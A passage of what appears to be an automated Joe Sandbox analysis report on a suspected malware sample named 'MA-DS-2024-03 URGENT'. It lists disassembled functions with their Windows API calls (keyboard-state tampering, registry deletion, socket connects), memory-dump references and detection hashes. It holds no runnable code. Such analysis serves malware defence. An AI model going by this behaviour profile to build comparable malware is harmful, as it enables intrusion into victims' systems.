                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                        • String ID: @
                                                        • API String ID: 3522835683-2766056989
                                                        • Opcode ID: 4975af1b66acc2cdc4697ab486286000be1627a70839434bd73fac2cc8b6325f
                                                        • Instruction ID: 5c1dd39b7f321ddcc7bcc10d078eb251a602d9f768a890d439a18523313ae713
                                                        • Opcode Fuzzy Hash: 4975af1b66acc2cdc4697ab486286000be1627a70839434bd73fac2cc8b6325f
                                                        • Instruction Fuzzy Hash: 3B61B1B1A006189FCB04EF55C48099EB7F5FF48314F14846EE819BB392CB38AD45CB88
                                                        Function 00460F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32(?), ref: 00460F8C
                                                        • GetKeyboardState.USER32(?), ref: 00460FA1
                                                        • SetKeyboardState.USER32(?), ref: 00461002
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                        • Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
                                                        • Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                        • Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A
                                                        Function 00460D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32(00000000), ref: 00460DA5
                                                        • GetKeyboardState.USER32(?), ref: 00460DBA
                                                        • SetKeyboardState.USER32(?), ref: 00460E1B
                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                        • Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
                                                        • Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                        • Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A
                                                        Function 016B7B9C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,016B8311,?,00000000,?,00000000,00000000), ref: 016B7BDE
                                                        • __fassign.LIBCMT ref: 016B7C59
                                                        • __fassign.LIBCMT ref: 016B7C74
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 016B7C9A
                                                        • WriteFile.KERNEL32(?,?,00000000,016B8311,00000000,?,?,?,?,?,?,?,?,?,016B8311,?), ref: 016B7CB9
                                                        • WriteFile.KERNEL32(?,?,00000001,016B8311,00000000,?,?,?,?,?,?,?,?,?,016B8311,?), ref: 016B7CF2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                        • String ID:
                                                        • API String ID: 1324828854-0
                                                        • Opcode ID: 7bda4658fda1a1611d71ee46f71b1f63b8bc96019d4ee484e3936861eb85034e
                                                        • Instruction ID: 1ea0a81b50c1b2af343e9fe17b33eeb6ee1f28b31c771abec435b61a53f18c78
                                                        • Opcode Fuzzy Hash: 7bda4658fda1a1611d71ee46f71b1f63b8bc96019d4ee484e3936861eb85034e
                                                        • Instruction Fuzzy Hash: 4C51A372A00209AFDB20CFA8DC85AEEBBF9EF49340F15455AE555E73C1D7309991CBA0
                                                        Function 0045D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                        • String ID: ,,I$DllGetClassObject
                                                        • API String ID: 753597075-1683996018
                                                        • Opcode ID: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                                        • Instruction ID: 3f0141d9bf832a65cf1f2fff52dd88c9064c6a7eaa25d9247cf5eee920db5d90
                                                        • Opcode Fuzzy Hash: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                                        • Instruction Fuzzy Hash: 1B41A4B1900204EFDF24DF14C884A9A7BA9EF44315F1581AEEC09DF206D7B4DD49CBA8
                                                        Function 00487291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 004872AA
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
                                                        • IsMenu.USER32(?), ref: 00487369
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
                                                        • DrawMenuBar.USER32 ref: 004873C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                        • String ID: 0
                                                        • API String ID: 3866635326-4108050209
                                                        • Opcode ID: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                                        • Instruction ID: fcd3fc1e0e94e91f8146e9bbeff2772ee04bbaba0065c2a20de26dc7b403efd4
                                                        • Opcode Fuzzy Hash: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                                        • Instruction Fuzzy Hash: AA411675A04208AFDB20EF50D894A9EBBB4FB04350F24882AFD15A7360D734ED64EB65
                                                        Function 00480FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
                                                        • FreeLibrary.KERNEL32(00000000), ref: 004810B5
                                                          • Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
                                                          • Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
                                                          • Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                        • String ID:
                                                        • API String ID: 395352322-0
                                                        • Opcode ID: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                        • Instruction ID: 3e22e70b6f2616eb7250a30d7d8a48524582d6e50c9a57dc89dcd50e66651605
                                                        • Opcode Fuzzy Hash: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                        • Instruction Fuzzy Hash: E2311D71900109BFDB15AF90DC89EFFB7BCEF09300F10096BE501E2251D6745E8A9BA9
                                                        Function 004862CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
                                                        • GetWindowLongW.USER32(00A83C28,000000F0), ref: 0048631F
                                                        • GetWindowLongW.USER32(00A83C28,000000F0), ref: 00486354
                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageSend
                                                        • String ID:
                                                        • API String ID: 2178440468-0
                                                        • Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                        • Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
                                                        • Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                        • Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59
                                                        Function 00476173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004761D5
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00476217
                                                        • WSAGetLastError.WSOCK32 ref: 00476221
                                                        • closesocket.WSOCK32(00000000), ref: 0047624A
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 910771015-0
                                                        • Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                        • Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
                                                        • Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                        • Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65
                                                        Function 016B3216 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 016B31DA: _free.LIBCMT ref: 016B3203
                                                        • _free.LIBCMT ref: 016B3264
                                                          • Part of subcall function 016B2096: HeapFree.KERNEL32(00000000,00000000,?,016B3208,?,00000000,?,00000000,?,016B322F,?,00000007,?,?,016B2697,?), ref: 016B20AC
                                                          • Part of subcall function 016B2096: GetLastError.KERNEL32(?,?,016B3208,?,00000000,?,00000000,?,016B322F,?,00000007,?,?,016B2697,?,?), ref: 016B20BE
                                                        • _free.LIBCMT ref: 016B326F
                                                        • _free.LIBCMT ref: 016B327A
                                                        • _free.LIBCMT ref: 016B32CE
                                                        • _free.LIBCMT ref: 016B32D9
                                                        • _free.LIBCMT ref: 016B32E4
                                                        • _free.LIBCMT ref: 016B32EF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                        • Instruction ID: 2f91b56ad6d4fbde2cf4f1652bd0038a45acbddaa4bf7a4228a2900cc8bf1726
                                                        • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                        • Instruction Fuzzy Hash: D9116D32B81B05AAD530FBB0CC85FCB77EF7F15701F40081CAA9A66261DA24B594C754
                                                        Function 0042406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
                                                        • GetProcAddress.KERNEL32(00000000), ref: 0042408C
                                                        • EncodePointer.KERNEL32(00000000), ref: 00424097
                                                        • DecodePointer.KERNEL32(00423F85), ref: 004240B2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                        • String ID: RoUninitialize$combase.dll
                                                        • API String ID: 3489934621-2819208100
                                                        • Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                        • Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
                                                        • Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                        • Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C
                                                        Function 016B44E9 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,016B473A,?,?,00000000), ref: 016B4543
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,016B473A,?,?,00000000,?,?,?), ref: 016B45C9
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 016B46C3
                                                        • __freea.LIBCMT ref: 016B46D0
                                                          • Part of subcall function 016B32FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 016B332C
                                                        • __freea.LIBCMT ref: 016B46D9
                                                        • __freea.LIBCMT ref: 016B46FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1414292761-0
                                                        • Opcode ID: f2fb4f3b0e36ad3dbb3fcdc9e343865699cefb63979dbb32952f94f1c56ad542
                                                        • Instruction ID: 428237976cf412f34526509a18a1f8df6b30978c7ca437adac4f4d17dd4acb72
                                                        • Opcode Fuzzy Hash: f2fb4f3b0e36ad3dbb3fcdc9e343865699cefb63979dbb32952f94f1c56ad542
                                                        • Instruction Fuzzy Hash: 2B51C172600226ABEB258E68CCC0EEB7BAAEB54650B154628FD06D7241FF74DCD0C754
                                                        Function 004664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 3253778849-0
                                                        • Opcode ID: 1f2fd32d1c09e4ca446b38a7b75ec12218465b447ddac1dcab588cb0eef34e6b
                                                        • Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
                                                        • Opcode Fuzzy Hash: 1f2fd32d1c09e4ca446b38a7b75ec12218465b447ddac1dcab588cb0eef34e6b
                                                        • Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A
                                                        Function 004801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                          • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00480399
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                        • String ID:
                                                        • API String ID: 4046560759-0
                                                        • Opcode ID: f0a89fa1a40745d355cf2e381e9086d1a3da3f2401f8ea26238a9b70f405dec2
                                                        • Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
                                                        • Opcode Fuzzy Hash: f0a89fa1a40745d355cf2e381e9086d1a3da3f2401f8ea26238a9b70f405dec2
                                                        • Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56
                                                        Function 0045EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 0045EF06
                                                        • VariantClear.OLEAUT32(00000013), ref: 0045EF78
                                                        • VariantClear.OLEAUT32(00000000), ref: 0045EFD3
